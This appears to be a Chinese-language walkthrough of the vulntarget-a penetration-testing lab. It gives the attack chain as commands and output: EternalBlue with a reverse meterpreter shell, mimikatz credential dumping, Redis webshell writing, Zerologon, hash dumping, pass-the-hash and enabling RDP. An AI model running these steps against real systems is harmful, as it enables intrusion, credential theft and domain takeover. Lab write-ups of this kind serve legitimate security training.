渗透测试中心
渗透测试中心

vulntarget靶场系列-a-writeup

网络配置

外网WIN7:
ip1: 192.168.127.91/255.255.255.0 ,gw:192.168.127.2 (NAT模式)
ip2:10.0.20.98-vmnet1 (仅主机模式)
域主机成员:
10.0.20.99-vmnet1(仅主机模式)
10.0.10.111-vmnet2(仅主机模式)
域控:
10.0.10.110-vmnet2(仅主机模式)
密码配置:
Win7:win7/admin
win2016:Administrator/Admin@123、vulntarget.com\win2016   Admin#123
win2019:vulntarget.com\administrator   Admin@666

信息收集

扫描主机

arp-scan  -l
扫描同一网段中的存活主机
vulntarget靶场系列-a-writeup_第1张图片
发现一个存活主机: 192.168.127.91

扫描端口

扫描一下存活靶机的ip地址

nmap -sC -T4 192.168.127.91
vulntarget靶场系列-a-writeup_第2张图片
发现目标系统为win7,且开放了445端口,尝试利用永恒之蓝(ms17-010)打一波目标系统

内网主机渗透

在 kali 中输入命令:
msfconsole
msf 6> search 17-010
msf 6> use 0
msf 6> set payload windows/x64/meterpreter/reverse_tcp
msf 6> set lport 6666
msf 6> set lhost 192.168.127.129
msf 6> set rhosts  192.168.127.91
msf 6> run
vulntarget靶场系列-a-writeup_第3张图片
meterpreter>shell  
C:\Windows\System32>ipconfig
vulntarget靶场系列-a-writeup_第4张图片
发现有些乱码,直接在设置一下
C:\Windows\System32>CHCP 65001     #65001 UTF-8代码页
C:\Windows\System32>ipconfig  # 发现有两个网段,一个是192.168.127的网段,另一个就是10.0.20网段
vulntarget靶场系列-a-writeup_第5张图片
C:\Windows\System32>whomai  #查看当前用户得权限为system权限
C:\Windows\System32>tasklist/svc  #查看进程,发现系统中没有杀软
vulntarget靶场系列-a-writeup_第6张图片
C:\Windows\System32>exit #退出shell命令终端
meterpreter>load kiwi  #加载mimikataz模块
meterpreter>creds_all  #获取当前所有用户得登录凭证,发现用户名为win7,密码为:admin
vulntarget靶场系列-a-writeup_第7张图片

Web渗透

直接访问,http://192.168.127.91/,发现是通达OA
vulntarget靶场系列-a-writeup_第8张图片
查看通达OA的版本号,当前版本为11.3
http://192.168.127.91/inc/expired.php
vulntarget靶场系列-a-writeup_第9张图片
通过搜索引擎搜索通达11.3存在文件包含漏洞
参考地址:https://blog.csdn.net/hackzkaq/article/details/115900500
这里使用一键图形化工具获得webshell
vulntarget靶场系列-a-writeup_第10张图片
使用蚁剑连接成功
vulntarget靶场系列-a-writeup_第11张图片
vulntarget靶场系列-a-writeup_第12张图片
同样在 蚁剑的命令终端下查看当前用户的权限为system权限
vulntarget靶场系列-a-writeup_第13张图片

横向渗透

进程迁移
获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透更难被检测到。自动迁移进程命令(run post/windows/manage/migrate)后,系统会自动寻找合适的进程然后迁移
meterpreter > run post/windows/manage/migrate   # 从1080的spoolsv.exe迁移到了noepad.exe的4800进程
vulntarget靶场系列-a-writeup_第14张图片
查看本地网络连接子网段
meterpreter > run  get_local_subnets
vulntarget靶场系列-a-writeup_第15张图片
添加一条动态路由
meterpreter > run autoroute -s 10.0.20.0/24
或者
meterpreter > background
meterpreter >sessions
msf6 exploit(windows/smb/ms17_010_eternalblue) >use post/multi/manage/autoroute
msf6 exploit(windows/smb/ms17_010_eternalblue) >set session 1
msf6 exploit(windows/smb/ms17_010_eternalblue) >run
vulntarget靶场系列-a-writeup_第16张图片
meterpreter > background
发现存活主机
msf6 exploit(windows/smb/ms17_010_eternalblue) >use post/windows/gather/arp_scanner
msf6 exploit(windows/smb/ms17_010_eternalblue) >set session 1
msf6 exploit(windows/smb/ms17_010_eternalblue) >set rhosts 10.0.20.1-254
msf6 exploit(windows/smb/ms17_010_eternalblue) >run
vulntarget靶场系列-a-writeup_第17张图片
发现了另一台存活主机10.0.20.99
开启socks5代理
msf6 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
vulntarget靶场系列-a-writeup_第18张图片
vulntarget靶场系列-a-writeup_第19张图片

端口扫描

首先先要需要修改/etc/proxychain4.conf配置文件

vim   /etc/proxychains4.conf
socks5  127.0.0.1  1080
通过nmap扫描目标IP的常用端口
proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080
vulntarget靶场系列-a-writeup_第20张图片
发现 10.0.20.99主机开放了6379和80端口
这里使用本地socks5代理客服端proxifier软件
vulntarget靶场系列-a-writeup_第21张图片
通过 dirsearch进行扫描,发现目标存在phpinfo.php敏感信息页面
python3   dirsearch.py  -l url.txt  -t 10  -e *   -i 200,302  --format csv -o C:\Users\backlion\Desktop\dirsearch-master\xxx.com.csv
或者攻击机kali下执行 
proxychains python dirsearch.py -uhttp://10.0.20.99 -i 200
proxychains dirsearch -u “http://10.0.20.99” --proxy=socks5://127.0.0.1:1080 -t 5
vulntarget靶场系列-a-writeup_第22张图片
访问phpinfo.php页面发现暴露了网站的绝对路径: C:/phpStudy/PHPTutorial/WWW/
http://10.0.20.99/phpinfo.php
vulntarget靶场系列-a-writeup_第23张图片
http://10.0.20.99/l.php
vulntarget靶场系列-a-writeup_第24张图片

Redis未授权访问

通过 redis-cli 命令可无密码进行远程连接
proxychains redis-cli -h 10.0.20.99
vulntarget靶场系列-a-writeup_第25张图片

Redis写入webshell

10.0.20.99:6379> CONFIG set dir "C:/phpStudy/PHPTutorial/WWW/"  #切换到可写入shell的绝对路径
10.0.20.99:6379> set x "\n\n\n\n\n\n"   #写入一句话木马
10.0.20.99:6379> config set dbfilename shell.php  #设置文件名为shell.php
10.0.20.99:6379> save
vulntarget靶场系列-a-writeup_第26张图片
这里通过本地主机上的蚁剑设置代理,且连接webshell
vulntarget靶场系列-a-writeup_第27张图片
vulntarget靶场系列-a-writeup_第28张图片
vulntarget靶场系列-a-writeup_第29张图片
查看当前用户权限为syestem
vulntarget靶场系列-a-writeup_第30张图片

上传MSF后门

生成正向shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=3333 -f exe > shell.exe
vulntarget靶场系列-a-writeup_第31张图片
使用蚁剑上传shell.exe到10.0.20.99,并执行
vulntarget靶场系列-a-writeup_第32张图片

配置监听器

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 3333
set RHOST 10.0.20.99
run
vulntarget靶场系列-a-writeup_第33张图片 

               
                 
                 
                 
                 

                
                  
                  
                  
                  

                 
                   
                   
                   
                   
关闭防火墙

                 
                   
                   
                   
                   
netsh firewall set opmode mode=disable

                
                  
                  
                  
                  

                
                  
                  
                  
                  

                 
                   
                   
                   vulntarget靶场系列-a-writeup_第34张图片
                
                  
                  
                  
                  

               
                 
                 
                 
                 

               
                 
                 
                 
                 

                蚁剑命令终端中运行shell.exe
               
                 
                 
                 
                 

               
                 
                 
                 
                 

                
                  
                  
                  vulntarget靶场系列-a-writeup_第35张图片
               
                 
                 
                 
                 

               
                 
                 
                 
                 

                  
                  
                  
                  
                收集同网段主机
               
                 
                 
                 
                 

               
                 
                 
                 
                 

                  
                  
                  
                  
                meterpreter > arp
               
                 
                 
                 
                 

               
                 
                 
                 
                 

                
                  
                  
                  
                  

                 
                   
                   
                   vulntarget靶场系列-a-writeup_第36张图片
                
                  
                  
                  
                  

                
                  
                  
                  
                  

                   
                   
                   
                   
                 扫出10.0.10.110网段
                
                  
                  
                  
                  

               
                 
                 
                 
                 

               
                 
                 
                 
                 

                迁移进程
               
                 
                 
                 
                 
run post/windows/manage/migrate
vulntarget靶场系列-a-writeup_第37张图片
meterpreter > sysinfo
vulntarget靶场系列-a-writeup_第38张图片
meterpreter > shell
vulntarget靶场系列-a-writeup_第39张图片
C:\phpStudy\PHPTutorial\WWW>CHCP 65001
收集IP信息
C:\phpStudy\PHPTutorial\WWW>ipconfig/all
vulntarget靶场系列-a-writeup_第40张图片
vulntarget靶场系列-a-writeup_第41张图片
有域存在,查看域控计算机名
C:\phpStudy\PHPTutorial\WWW>net group "domain controllers" /domain
vulntarget靶场系列-a-writeup_第42张图片
查看域管理员
C:\phpStudy\PHPTutorial\WWW>net group "enterprise admins" /domain
vulntarget靶场系列-a-writeup_第43张图片

域提权

添加路由
meterpreter > run post/multi/manage/autoroute
meterpreter > run autoroute -p
vulntarget靶场系列-a-writeup_第44张图片
meterpreter > run post/windows/gather/enum_domain
vulntarget靶场系列-a-writeup_第45张图片
proxychains4 nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139
vulntarget靶场系列-a-writeup_第46张图片
下载impacket包,并进行安装
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 -m pip install -r requirements.txt
python3 -m pip install .
下载CVE-2020-1472EXP
git clone  https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472
执行EXP
proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
vulntarget靶场系列-a-writeup_第47张图片
获取域管理员hash
cd  /opt/impacket/examples
proxychains python3 secretsdump.py vulntarget.com/WIN2019\[email protected] -no-pass
vulntarget靶场系列-a-writeup_第48张图片
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:d0b248a756f62bbef5b286c7be19c7a9:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:414bc47994e3bf616da9e115ba8c7e528ce17315734337479d6f67df3ca6e682
WIN2016$:aes128-cts-hmac-sha1-96:8b30d9d37e7f7f474124382d2fe75950
WIN2016$:des-cbc-md5:6d97313875e362c8
拿到管理员hash,执行提权exp 
proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15  [email protected]
vulntarget靶场系列-a-writeup_第49张图片
开启3389远程桌面端口:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

直接3389登录:proxychains  rdesktop 10.0.10.110

账号:balsec.com\administrator   密码:Admin@666

vulntarget靶场系列-a-writeup_第50张图片

你可能感兴趣的:(网络,安全)

  • 深度学习:探索人工智能的无限可能 木小梦(๑• . •๑) 人工智能深度学习
    引言:在当今这个数字化时代,人工智能(AI)已经成为了一个热门话题。从自动驾驶汽车到智能助手,AI正在逐渐改变我们的生活方式。而在AI领域,深度学习是近年来发展最为迅速的一个分支。本文将深入探讨深度学习及其相关领域,包括计算机视觉、自然语言处理、神经网络和强化学习。1.深度学习深度学习是一种基于人工神经网络的机器学习方法,它试图模拟人脑的工作方式,通过训练大量数据来自动学习数据的内在规律和表示层次
  • 虚拟运营商号段有哪些?移动电信联通虚拟运营商号码段大全 全网优惠分享
    虚拟运营商号段有哪些?移动电信联通虚拟运营商号码段大全!关注微•信•公•众•号"卡泡泡"就知道啦!这篇文章收集整理了北京电信虚拟运营商的所有号码段,还在查询北京电信虚拟运营商号段有哪些的网友可以自行查看。我国使用的号码为11位,号码的组成由网络识别号+地区编码+用户号码组成,即:第1-3位数字为网络识别号;第4-7位数字为地区编码;第8-11位数字为用户号码。比如15295061818,前面的15
  • 入坑网安后悔一年,不入坑后悔一辈子! 程序员鬼鬼 网络安全web安全php开发语言计算机网络网络安全
    网络安全不仅作为当下应届生收入较高的专业之一,网络安全在转行领域也占据了热门位置,主要具备以下几点转行优势。行业人才缺口大,到2027年我国网安人才缺口将达327万知识体系友好,计算机及英语水平相对薄弱的同学也可学习上手入行门槛低,大专学历即可学习就业薪资起点高就业选择范围广,一个专业包含十余种岗位岗位丰富,选择空间大,决定职业发展的高度,这也是网络安全备受青睐的原因之一。岗位一:渗透测试。模拟黑
  • 正规的网络赚钱方式_推荐5种网络赚钱方法 测评君高省
    现在我们的生活已经离不开互联网,尤其是5G网络普及以后,互联网让我们的生活变得更加便捷。同时很多人将创业的目光都转移到了线上,只是他们不知道从哪里着手,该做什么类型的创业项目,那么互联网创业赚钱项目有哪些?下面就来推荐一下。1、社交导购电商赚钱2023年火爆全网的社交导购电商,红利期,有兴趣的朋友可以了解一下。全网佣金最高的「高省」APP,高省邀请码:005500。分享商品及推广APP做团队赚佣金
  • 高省App下载?高省邀请码是必须的吗? 高省APP
    本文来自于【高省】粉丝Ami投稿!如今的社会生活节奏比较快,很多人都过着两点一线的生活,上着朝九晚五的班,甚至不乏一些996的高压力上班族。不要说逛街,购物,嗨皮,有时候想安静的吃顿饭都成为了一种奢侈。所以大部分人都会选择网络购物,淘宝,天猫,拼多多,京东,苏宁等购物平台都是手机里必不可少的APP。尤其是疫情以来,在家带娃的宝妈,带着宝宝去哪里都不方便,也不放心,网购热已经是大势所趋,民心所向了!
  • 【UE 网络】Gameplay框架在DS架构中的扮演的角色 海码007 UE网络架构phpUE
    目录0引言1核心内容1.1Gameplay各部分创建的流程1.2Gameplay框架在DS和客户端的存在情况1.3数据是独立存在于DS和客户端的2Gameplay框架各自负责的功能2.1GameMode2.2GameState2.3PlayerController2.4PlayerState2.5Pawn2.6AIController2.7Actor2.8HUD2.9UI‍♂️作者:海码007专栏
  • 用手机兼职副业赚钱违法吗(用手机做副业 做什么赚钱) 趣闲赚手机做任务赚佣金
    在现今社会,手机已成为了我们生活的必需品。我们几乎每天都需要用手机进行通讯、网络浏览、社交娱乐等操作。然而,有些人也利用手机进行副业赚钱,那么,用手机兼职副业赚钱是否违法呢?趣闲赚上面的任务单价也就是几块钱到几十元一单,做的多挣的多。【趣闲赚】拿着手机做赏金任务,1元提现秒到账,在家躺着也赚钱!点击链接或者扫码下载:https://www.jianshu.com/p/8dbac7aa59c7点击:
  • WIFI通信-笔记整理 D_Procedural_Life wifi通信wifi网络传输
    一、Wifi基本属性介绍1、WLANWLAN是WirelessLAN(无线局域网)的简称,基于IP的的通信,能提供一定范围内的高速数据连接,一般采用2.4GHz或5.8GHz无线频段(ISM频段)传输,没有线缆限制,传输距离几十米,采用特殊技术可以达到几百米以上。IEEE在WLAN方面的工作只定义了二层以下的协议,目前主要集中在安全性、AP之间的信令、频谱扩展等方面。2、WiFiWiFi是Wire
  • 高省官方邀请码—高省官方邀请码是多少(团长码) 凌风导师
    拼多多纸巾怎么那么便宜安全吗拼多多纸巾群怎么自己搞一个高省,佣金超高。高省,高佣领导者。高省-各大应用商城下载即可-购物领劵返利高,邀请码切记填999777,凌风高省邀请码999777,全网唯一教你技术的老师码填对码直送2皇冠总裁等级,《凌风导师125130414》送价值百万引流技术推广绝密大礼包,也可以后台联系老师进高省官方群。返利比例可达到99%,市面上那些返利APP的佣金比例普遍都在58%左
  • 《黑悟空·神话》中国人游戏成瘾的根源分析? netkiller- 管理手札游戏
    《黑悟空·神话》中国人游戏成瘾的根源分析?年轻人沉迷游戏的根源是什么?在中国,网络和游戏是成本最低的娱乐方式之一,它具备了两个特点,碎片化时间利用和随时随地娱乐,很方便。但凡有其他娱乐方式更廉价,人们就不会沉迷网络和游戏。可以说短视频和游戏填充了整个中国人的碎片时间。造成中国人生存现状的根源是什么?社会底层逻辑:让底层人有持续的希望,给他们想要的尊严,维护他们的玻璃心,保留一条门槛极高的上升通道,
  • YOLOV5训练时P、R、mAP等值均为0的问题 该醒醒了~ pythonC#C++各种报错问题深度学习人工智能计算机视觉
    当YOLOv5的训练P、R、mAP等指标为0时,通常有以下一些原因:数据集质量不佳:检查数据集中是否存在较大的类别不平衡或者太多的噪声。可能需要重新清理数据集以确保标签正确且具有可解释性。学习率过高或过低:首先尝试将学习率降低到一个更合适的水平,并考虑使用学习率调度程序来优化训练过程。模型过于简单:如果模型过于简单,则很难从样本中学习到有效的特征。考虑增加网络的深度和宽度,或使用更复杂的网络结构。
  • 莆田鞋在哪里买?推荐五个渠道 优鞋之家
    莆田鞋在哪里买?推荐五个渠道莆田鞋一般在实体店、批发市场、微商等等渠道都可以买到,那如果是拿货卖的话,厂家、档口、批发市场等渠道都还不错。详情咨询VX→2428762639微信图片_20221024210734.jpg莆田鞋在哪里可以买到1、网上可以购买到。目前,选择莆田鞋方便的一个渠道就是通过网络渠道购买。可以去一些专门的网站去选择自己想要的手表,也可以去通过朋友圈中去购买自己想要的莆田鞋。到目
  • ARMxy工业控制器搭载 Mini PCIe加密安全芯片工业控制拓展之旅 钡铼技术物联网关 arm开发物联网硬件工程自动化
    在当今高度数字化和智能化的工业领域,数据采集的准确性、实时性和全面性对于优化生产流程、提高产品质量以及保障生产安全至关重要。ARM工业控制器以其高效能、低功耗和出色的稳定性,成为了工业自动化领域的重要组成部分。而其中的MiniPCIe接口更是为数据采集功能带来了显著的创新和增强。ARM工业控制器凭借其强大的处理能力和丰富的接口资源,本身就具备了出色的数据处理和传输能力。然而,MiniPCIe接口的
  • 飞凌方案丨基于LS1028A系列核心板打造一款边缘计算网关 spear800 5GLS1028A飞凌嵌入式边缘计算网关
    随着物联网、大数据、人工智能等技术的快速发展与应用,给传统的云计算模式带来了巨大的挑战,这也催生出了计算模式的变革,边缘计算由此诞生。所谓边缘计算,是指在靠近物或数据源头的一侧,采用网络、计算、存储、应用核心能力为一体的开放平台,就近提供最近端服务。通俗的讲,就是在数据采集的本地完成对数据的计算、处理后(譬如打上时间戳,数据格式化、对事件和过程数据分类),根据结果进行“就地”决策,并将处理完成的数
  • 高级java每日一道面试题-2024年8月28日-基础篇-ArrayList的底层工作原理? java我跟你拼了 java每日一道面试题javaspringArrayList数据结构基础篇
    如果有遗漏,评论区告诉我进行补充面试官:ArrayList的底层工作原理?我回答:在Java高级面试中,了解ArrayList的底层工作原理是非常重要的,因为ArrayList是Java中最常用的数据结构之一。下面是ArrayList的底层工作原理的详细解释,包括其实现细节、扩容机制、线程安全性和性能特点等方面。1.数据结构ArrayList内部使用了一个Object类型的数组(Object[]e
  • 基于yolov8的绝缘子缺陷检测系统python源码+onnx模型+评估指标曲线+精美GUI界面 FL1623863129 深度学习YOLO
    【算法介绍】基于YOLOv8的绝缘子缺陷检测系统是一种利用先进深度学习技术的高效解决方案,旨在提升电力行业中输电线路的维护和监控水平。YOLOv8作为YOLO系列算法的最新版本,具备更高的检测速度和精度,特别适用于实时物体检测任务。该系统通过深入分析并标注绝缘子数据集,训练YOLOv8模型以精确识别输电线上的绝缘子及其缺陷状态。利用多尺度检测、FPN结构以及CSPDarknet网络等技术,YOLO
  • 5G ARMxy边缘计算网关依靠 SPI加密芯片保障工业数据传输 钡铼技术物联网关 5G边缘计算人工智能linux物联网arm开发
    数字化进程迅猛推进的时代,数据的采集、处理以及传输所占据的地位愈发关键。ARM边缘计算机以其超乎寻常的强大性能和丰富多彩的功能特性,为形形色色的应用场景奉献出了高效且值得信赖的解决方案。ARM边缘计算机对于多种操作系统均予以支持,像是广为人知的Linux系统,还有深受欢迎的Ubuntu系统等。如此一来,便为开发者以及用户开拓出了极为广阔的选择空间,能够充分满足各种不同应用的具体需求。就网络连接这一
  • 永远不要自以为是 竹抱虚心
    每天上班路上总会看到各式各样闯红灯的人。着急上班的,着急送娃上学的,觉得反正四周无车辆经过的,我在红灯面前默默地等待着,静静地看着他们。曾经我也有过这样的行为,总觉得自己是有把握确保安全的。只不过在医院呆久了,看到的惨痛教训太多了,再也不敢大意了。小心驶的万年船,遵照规矩的人总会幸运一点点。印象最深的是考驾照那会,教练一直教导说,永远不要自以为是,世上不是只有你会开车,也不是只有你懂规则,会变通才
  • 《比较学》理论介绍 韩妙第
    《比较学》图片来自网络作者:韩妙第日期:2022年11月14日《比较学》理论介绍作者:韩妙第日期:2022年11月14日一.量化性何为量化?是否运用工具是人和动物的根本区别。量化指的是将比较对象蕴含的各种要素,通过测量、检测、论证、观察、引用和存储等手段获得的参数进行评价的方法。这是因为这些参数可以让人明确的感知比较对象的内涵信息,本体境况以及外延效应。从而在实践中能够做到有效的管理、有目的的运营
  • 小孩千万别玩刀枪棍棒,否则会留下隐患 充满元气的枫叶
    中国人不要玩刀枪棍棒,不在心里埋下暴力种子,应该更加格外重视对于孩子品性的培养。中国乃是礼仪之邦,孔子曾说:“仁者不忧,智者不惑,勇者无惧。”儒家讲要有仁爱之心,可是现在的中国却不一样,只要去玩具店或商场,映入眼帘的到处是刀枪、大炮、坦克、棍棒等类型的玩具,甚至还有一些模仿网络游戏的线下活动(比如穿越火线、和平精英等),且深受小朋友以及大人的喜爱,只要拿到手,就开始学着电视上的英雄打打杀杀,仿佛自
  • 浏览器的网络请求304的缓存问题 victor-AI最好的学习方式是画图 http
    1、http请求时浏览器先看本地缓存有没有该文件,没有文件就直接发起http请求获取最新js、html等文件。(缓存里面有该文件且没有过期直接使用本地缓存,谁都不商量,所以叫强制缓存)。2、本地缓存如果过期了的话就去问一下服务器请求的该文件有没有修改,没有修改就返回304继续使用本地缓存,同时更新一下本地缓存的过期时间(Expires和Cache-Control),修改的话返回200获取新文件。(
  • 众人之眼——开源软件的安全状况 weixin_34291004 pythonphp操作系统
    开源社区最引以为豪的透明、公开、众人参与等特性,也许很大程度上只是起到了掩饰开源生态系统中弱点的作用。那种人人以为开源才保持不间断的警醒氛围,实际上非常虚幻。近期备受瞩目的多个漏洞让人开始怀疑“众人之眼”的正确性,但也实实在在地推动了开源生态系统在安全性上的实质性进展。若说世上有直面开源安全挑战的标杆式人物,那可能得数维尔纳·科赫——编写了GnuPG并辛勤维护了这一开源软件生态系统支柱18年的德国
  • 书店销售内部后台管理系统员工信息部门图书入库账目集成分析销售客户 计算机程序设计开发 java课程设计计算机毕业设计javaspringboot
    本系统的设计实施为书店管理系统的运行做基础,为书店的管理提供良好的条件。系统主要实现了:员工信息管理、部门管理、图书管理、入库管理、账目集成分析、销售管理、客户管理。2.1系统开发工具本系统主要使用JSP技术对系统进行设计和开发。JSP拥有Java程序设计语言“一次编写,各处执行”、“安全性、保密性高”等的特点[13];使用MYSQL数据库作为后台数据库,MYSQL系统具有强大的网上功能,可以在互
  • 放手 金紫缘
    (和诗友@骑马上岸的人)弟有情姐无意爱她放手让她去...看着她幸福你内心才能甜蜜爱她也只能藏在心里爱她在春风里爱她活在回忆里爱她活在幻想里爱她充满粉色的诗意...图片来自网络,感谢作者!图片发自App图片发自App图片发自App图片发自App
  • 各大网站vip视频免费观看 腾讯、爱奇艺、优酷、乐视、搜狐、芒果等 Mac版 iodefog
    本软件仅供学习参考,切勿商业使用。接口均来源于网络。软件dmg地址:https://iodefog.github.io/dmg/VipVideo.dmg软件功能介绍:1.展示窗口2.新建窗口3.GoBack4.GoFoward5.切换下一个(支持快捷键)6.切换上一个(支持快捷键)7.复制链接(用于分享或者浏览器播放)8.切换vip接口9.退出主页功能UI位置使用方法:以爱奇艺vip电影《勇敢者游
  • AI学习记录 - 对抗性神经网络 victor-AI最好的学习方式是画图 人工智能学习神经网络
    有用点赞哦学习机器学习到一定程度之后,一般会先看他的损失函数是什么,看他的训练集是什么,训练集是什么,代表我使用模型的时候,输入是什么类型的数据。对抗神经网络其实可以这样子理解,网上一直说生成器和判别器的概念,没有触及到本质。我有一种看法:假如当前场景是输入模糊图片,然后输出高质量图片。当判别器和生成器本来就是一个模型,在不把判别器生成器拆开的时候,我输入一张图片,这个模型输出的是0和1,那这个整
  • Python在神经网络中优化激活函数选择使用详解 Rocky006 python开发语言
    概要在神经网络中,激活函数扮演着至关重要的角色。它的主要作用是引入非线性因素,使得神经网络能够处理复杂的非线性问题。如果没有激活函数,神经网络仅仅是线性模型的堆叠,无法胜任深度学习中的各种任务。本文将深入探讨几种常用的激活函数,包括Sigmoid、Tanh、ReLU及其变种,并通过具体的代码示例展示它们在Python中的实现和应用。激活函数的重要性激活函数将输入信号进行非线性转换,从而增强神经网络
  • 操作系统原子操作 zzt_is_me 算法linux
    原子操作所谓的原子操作就是不可被拆分的操作,对于多线程对全局变量进行操作时,就再也不用再线程锁了,和pthread_mutex_t保护作用是一样的,也是线程安全的,有些编译器在使用时需要加-march=i686编译参数。type__sync_fetch_and_add(type*ptr,typevalue);//+type__sync_fetch_and_sub(type*ptr,typevalu
  • mysql安全机制 name_cc2f
    权限级别查看权限记录表查看权限记录表1查看权限记录表2mysql用户管理:创建用户方法一、CREATEUSERuser1@'localhost'IDENTIFIEDBY'QianFeng@123456';验证:select*frommysql.user\G;方法二、GRANTALLON*.*TO'user3'@'localhost'IDENTIFIEDBY'QianFeng@123456';验证:
  • Chrome显示无标题错误代码STATUS_INVALID_IMAGE_HASH 洗洁精下班 chrome
    笔者想要试用一下openai,88邮箱不行,qq邮箱不行,好像Gmail可以,酷酷打开chrom一顿试,无标题?无标题?全是无标题?卸载重装无果1、网络问题?梯子正常其他浏览器正常,所以排除。2、浏览器和梯子端口问题?主要是当下点settings也是无标题。哼哼,气笑了。3、扩展程序不兼容?extentions也打不开。。4、东看西看出现STATUS_INVALID_IMAGE_HASH错误代码,
  • 关于旗正规则引擎中的MD5加密问题 何必如此 jspMD5规则加密
    一般情况下,为了防止个人隐私的泄露,我们都会对用户登录密码进行加密,使数据库相应字段保存的是加密后的字符串,而非原始密码。 在旗正规则引擎中,通过外部调用,可以实现MD5的加密,具体步骤如下: 1.在对象库中选择外部调用,选择“com.flagleader.util.MD5”,在子选项中选择“com.flagleader.util.MD5.getMD5ofStr({arg1})”; 2.在规
  • 【Spark101】Scala Promise/Future在Spark中的应用 bit1129 Promise
    Promise和Future是Scala用于异步调用并实现结果汇集的并发原语,Scala的Future同JUC里面的Future接口含义相同,Promise理解起来就有些绕。等有时间了再仔细的研究下Promise和Future的语义以及应用场景,具体参见Scala在线文档:http://docs.scala-lang.org/sips/completed/futures-promises.html
  • spark sql 访问hive数据的配置详解 daizj spark sqlhivethriftserver
    spark sql 能够通过thriftserver 访问hive数据,默认spark编译的版本是不支持访问hive,因为hive依赖比较多,因此打的包中不包含hive和thriftserver,因此需要自己下载源码进行编译,将hive,thriftserver打包进去才能够访问,详细配置步骤如下:   1、下载源码   2、下载Maven,并配置 此配置简单,就略过
  • HTTP 协议通信 周凡杨 javahttpclienthttp通信
                            一:简介  HTTPCLIENT,通过JAVA基于HTTP协议进行点与点间的通信!     二: 代码举例      测试类: import java
  • java unix时间戳转换 g21121 java
    把java时间戳转换成unix时间戳: Timestamp appointTime=Timestamp.valueOf(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date())) SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd hh:m
  • web报表工具FineReport常用函数的用法总结(报表函数) 老A不折腾 web报表finereport总结
    说明:本次总结中,凡是以tableName或viewName作为参数因子的。函数在调用的时候均按照先从私有数据源中查找,然后再从公有数据源中查找的顺序。   CLASS CLASS(object):返回object对象的所属的类。   CNMONEY CNMONEY(number,unit)返回人民币大写。 number:需要转换的数值型的数。 unit:单位,
  • java jni调用c++ 代码 报错 墙头上一根草 javaC++jni
    # # A fatal error has been detected by the Java Runtime Environment: # #  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000000777c3290, pid=5632, tid=6656 # # JRE version: Java(TM) SE Ru
  • Spring中事件处理de小技巧 aijuans springSpring 教程Spring 实例Spring 入门Spring3
    Spring 中提供一些Aware相关de接口,BeanFactoryAware、 ApplicationContextAware、ResourceLoaderAware、ServletContextAware等等,其中最常用到de匙ApplicationContextAware.实现ApplicationContextAwaredeBean,在Bean被初始后,将会被注入 Applicati
  • linux shell ls脚本样例 annan211 linuxlinux ls源码linux 源码
    #! /bin/sh - #查找输入文件的路径 #在查找路径下寻找一个或多个原始文件或文件模式 # 查找路径由特定的环境变量所定义 #标准输出所产生的结果 通常是查找路径下找到的每个文件的第一个实体的完整路径 # 或是filename :not found 的标准错误输出。 #如果文件没有找到 则退出码为0 #否则 即为找不到的文件个数 #语法 pathfind [--
  • List,Set,Map遍历方式 (收集的资源,值得看一下) 百合不是茶 listsetMap遍历方式
